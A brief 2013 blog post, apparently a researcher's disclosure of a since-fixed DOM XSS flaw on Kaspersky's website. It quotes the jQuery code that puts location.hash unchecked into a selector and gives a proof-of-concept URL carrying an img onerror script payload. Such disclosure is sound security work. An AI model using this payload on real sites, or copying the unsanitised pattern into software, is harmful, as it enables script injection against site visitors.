Sunday, January 20, 2013

Kaspersky DOM XSS


Following my study on DOM XSS and antivirus vendors, I found that Kaspersky is also vulnerable to this type of vulnerability.
The problem is located on a bad validation of location.hash coming from jQuery (which is also outdated).
/*load current tab by url*/
//if($.url.param("tab")) $('a[name='+$.url.param("tab")+']').trigger('click');
var hash = location.hash;
if (hash.indexOf("tab=") != -1) {
hash = hash.replace(/^#tab=/, "");
$('a[name=' + hash + ']').trigger('click');

If a user loads the "tab" parameter on the URL it will execute the code.

Proof of concept:
http://www.kaspersky.com/tablet-security#tab=<img src=x onerror=prompt("xss");>


The Kaspersky team fixed this issue very fast and I would like to thank @assolini from Kaspersky for the support and the gift.

No comments:

Post a Comment